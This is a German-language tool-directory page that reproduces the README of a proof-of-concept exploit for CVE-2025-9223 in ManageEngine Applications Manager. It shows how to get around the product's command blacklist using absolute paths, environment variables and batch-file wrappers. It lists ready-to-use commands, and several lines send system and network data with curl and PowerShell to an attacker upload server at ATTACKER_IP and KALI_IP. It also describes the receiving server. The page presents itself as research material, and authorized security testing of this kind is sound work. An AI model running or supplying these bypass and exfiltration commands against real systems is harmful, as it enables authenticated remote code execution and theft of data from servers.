Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-9223 — POC CVE-2025-9223 | Kitploit
Tools/GitHubGitHub/networkkiller/cve-2025-9223
SchwachstellenanalyseExploitationWebanwendungs-ExploitationDatenexfiltrationPenetrationstestsCommand and ControlLernen & Bildung
GitHubnetworkkiller/cve-2025-9223

CVE-2025-9223

POC CVE-2025-9223

Repository anzeigen
2vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Applications Manager - Execute Program Action Bypass PoC

Security Research Python 3.x Proof of Concept

📖 Beschreibung

Dieses Repository enthält einen Proof of Concept (PoC), der eine Schwachstelle bei der Ausführung von Befehlen in der Funktion "Execute Program Action" von ManageEngine Applications Manager demonstriert.

🔍 Details der Schwachstelle

Applications Manager verwendet eine Blacklist (BlackListCommands), um gefährliche Befehle zu blockieren, aber die Validierung weist kritische Schwachstellen auf:

  • String-basierte Validierung nur für das erste Token
  • Keine Pfadnormalisierung oder Erweiterung von Umgebungsvariablen
  • Kein Schutz gegen indirekte Ausführung über Skripte

🚨 Bypass-Methoden

MethodeBeispiel
Absoluter PfadC:\Windows\System32\netstat.exe
Umgebungsvariablen%SystemRoot%\System32\netstat.exe
Skript-Wrapperecho netstat > a.bat && a.bat

💥 Auswirkungen

  • ✅ Authentifizierte Remote-Code-Ausführung (RCE) auf dem Applications-Manager-Host
  • ✅ Vollständige Ausführung von Systembefehlen unter Umgehung von Sicherheitsbeschränkungen
  • ✅ Datenexfiltration mithilfe von Systemdienstprogrammen (curl, powershell, certutil)

📤 Beispiel für einen Exfiltration-Payload

root@kitploit:~
C:\Windows\System32\netstat.exe > out.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://[KALI_IP]:8000/upload

🛠️ Konfiguration und Verwendung

Voraussetzungen

  • Python 3.x
  • Netzwerkzugriff auf die Zielinstanz von Applications Manager
  • Authentifizierter Zugriff mit Berechtigungen für "Execute Program Action"

Datei-Upload-Server

Das Skript upload_server.py stellt einen einfachen HTTP-Server bereit, um exfiltrierte Dateien zu empfangen.

Grundlegende Verwendung

root@kitploit:~
python3 upload_server.py

Erweiterte Optionen

root@kitploit:~
python3 upload_server.py --host 0.0.0.0 --port 8000 --dir ./uploads

Parameter

  • --host: Bindungsadresse (Standard: 0.0.0.0)
  • --port: HTTP-Port (Standard: 8000)
  • --dir: Ausgabeverzeichnis (Standard: aktuelles Verzeichnis)

API-Endpunkte

Sicherheitsfunktionen

✅ Schutz vor Path Traversal
✅ Eindeutige Dateinamen mit Zeitstempel
✅ Protokollierung von Anfragen mit IP und User-Agent
✅ Validierung des Inhaltstyps

🎯 Testbefehle

Erstelle eine Datei test_commands.txt mit Bypass-Beispielen:

root@kitploit:~
# Bypass mit absolutem Pfad
C:\Windows\System32\whoami.exe
C:\Windows\System32\netstat.exe -an

# Bypass mit Umgebungsvariablen
%SystemRoot%\System32\ipconfig.exe
%SystemRoot%\System32\systeminfo.exe

# Bypass mit Skript-Wrapper
echo ipconfig > test.bat && test.bat
echo whoami > test.bat && call test.bat

# Beispiele für Datenexfiltration
C:\Windows\System32\ipconfig.exe > network.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://ATTACKER_IP:8000/upload
C:\Windows\System32\systeminfo.exe > system.txt && C:\Windows\System32\powershell.exe -c "Invoke-WebRequest -Uri http://ATTACKER_IP:8000/upload -Method POST -InFile system.txt"

⚠️ Rechtlicher Hinweis

WICHTIG: Dieses Tool dient ausschließlich Bildungszwecken und autorisierten Tests.

❌ NICHT auf Systemen verwenden, die dir nicht gehören oder für die du keine ausdrückliche Testgenehmigung hast
❌ NICHT für illegale Aktivitäten verwenden
✅ DOCH nur in kontrollierten Umgebungen für Sicherheitsforschung verwenden
✅ DOCH vor Tests eine angemessene Autorisierung einholen

Der Autor ist nicht verantwortlich für jegliche missbräuchliche Verwendung dieses Tools. Die Benutzer übernehmen die volle Verantwortung und das gesamte Risiko.

📄 Lizenz

Dieses Projekt dient nur Forschungs- und Bildungszwecken. Alle Rechte vorbehalten.

👨‍💻 Autor

Johan Aybar - Zu Bildungszwecken


⚠️ ERINNERUNG: Dieser PoC darf nur in autorisierten Testumgebungen verwendet werden. Unbefugte Nutzung kann illegal sein und ist strengstens untersagt.

Tool herunterladen
MethodeEndpunktBeschreibung
GET/Listet kürzlich hochgeladene Dateien auf
POST/uploadLädt Dateien hoch (multipart/form-data)
PUT/upload/[filename]Direktes Hochladen von Dateien